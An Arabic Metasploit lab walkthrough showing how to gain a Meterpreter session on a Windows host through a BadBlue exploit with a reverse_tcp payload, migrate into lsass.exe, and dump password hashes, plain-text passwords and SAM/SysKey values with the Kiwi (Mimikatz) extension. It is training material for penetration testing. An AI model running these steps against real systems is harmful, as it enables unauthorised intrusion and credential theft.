search

🧪 المختبر العملي 21 : استخراج بيانات الاعتماد باستخدام Kiwi Extension (Mimikatz)

المختبر العملي 21 : استخراج بيانات الاعتماد باستخدام Kiwi Extension (Mimikatz)

🎯 الهدف الأساسي: استخراج كلمات المرور النصية الواضحة (Plain-Text Passwords) وتجزئات كلمات المرور (Hashes) من ذاكرة نظام Windows وقاعدة بيانات SAM، باستخدام امتداد Kiwi (Mimikatz) في Meterpreter.

🔧 الأدوات المستخدمة:

  • MSFconsole: واجهة Metasploit الرئيسية.

  • Exploit Module: أي وحدة استغلال تمنح جلسة Meterpreter بصلاحيات SYSTEM (مثلاً: windows/http/rejetto_hfs_exec ثم UAC Bypass).

  • Meterpreter Payload: للحصول على تحكم كامل.

  • Meterpreter Extension: kiwi: لتشغيل وظائف Mimikatz .

📜 خطوات التنفيذ:

hashtag
📊 مرحلة الاستغلال (Exploitation)

  1. 🚀 بدء تشغيل MSFconsole والحصول على جلسة Meterpreter بصلاحيات SYSTEM:

    • ابدأ msfconsole:

      msfconsole -q

    • حدد عنوان IP للهدف.

    • 🔑 استخدام وحدة استغلال ضعيفة للحصول على Meterpreter (مثل Badblue HTTP Server):

      use exploit/windows/http/badblue_passthru
set RHOSTS [Target_IP_Address]
set LHOST [Your_Kali_IP_Address]
set LPORT 4444
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

    • إذا نفذت هذه الأوامر بنجاح، ستفتح جلسة Meterpreter session 1 opened.

    • 🔧 ترحيل العملية ورفع الصلاحيات (ضروري لـ Mimikatz):

      • يجب أن تكون جلسة Meterpreter تعمل بصلاحيات SYSTEM ومن داخل عملية lsass.exe لاستخراج كلمات المرور بفاعلية.

      • ترحيل العملية إلى lsass.exe (أو عملية نظامية أخرى):

        migrate -n lsass.exe
# أو migrate [PID_of_lsass.exe] إذا عرفت PID من ps

      • إذا نفذت هذا الأمر، ستنتقل جلسة Meterpreter.

      • تأكد من صلاحياتك:

        getuid

      • يجب أن تظهر صلاحياتك SYSTEM. إذا لم تكن SYSTEM، فستحتاج إلى تنفيذ خطوات رفع الصلاحيات (مثل UAC Bypass أو getsystem).

hashtag
📊 مرحلة ما بعد الاستغلال: استخراج بيانات الاعتماد (Credential Dumping)

  1. 💡 تحميل امتداد Kiwi:

    • 🔑 تحميل الإضافة:

    • إذا نفذت هذا الأمر، سيتم تحميل امتداد Kiwi بنجاح، مما يضيف أوامر Mimikatz إلى جلسة Meterpreter.

  2. 💡 استخراج جميع بيانات الاعتماد (Hashes و Plain-Text Passwords):

    • 🔑 استخدام أمر creds_all:

    • إذا نفذت هذا الأمر، ستُظهر لك قائمة بجميع بيانات الاعتماد المستخرجة من ذاكرة النظام، بما في ذلك أسماء المستخدمين، تجزئات NTLM و LM (إن وجدت)، وحتى كلمات المرور النصية الواضحة (إذا كانت متاحة في الذاكرة).

    • 🔗 ربط سلسلة الأدوات: هذه البيانات حاسمة لمزيد من الاختراق (Pass-the-Hash) أو لرفع الصلاحيات.

  3. 💡 استخراج تجزئات SAM وقيمة SysKey (اختياري):

    • يمكنك أيضًا استخراج تجزئات قاعدة بيانات SAM (Local Security Authority Manager) وقيمة SysKey، والتي تُستخدم لفك تشفير تجزئات SAM.

    • استخراج تجزئات SAM وقيمة SysKey:

    • إذا نفذت هذا الأمر، ستُعرض لك تجزئات SAM وقيمة SysKey.

نقاط التحقق:

  • يجب الحصول على جلسة Meterpreter بصلاحيات SYSTEM.

  • يجب ترحيل جلسة Meterpreter إلى عملية lsass.exe.

  • يجب تحميل امتداد Kiwi بنجاح.

  • يجب أن تتمكن من استخراج تجزئات كلمات المرور وأسماء المستخدمين وكلمات المرور النصية الواضحة (إن وجدت) باستخدام creds_all.

  • يجب أن تتمكن من استخراج قيمة SysKey.

Previous👾3- The-Metasploit-Framework-MSF LABNext🧪 المختبر العملي 22 : الحفاظ على الوصول - خدمة الثبات (Maintaining Access – Persistence Service

Last updated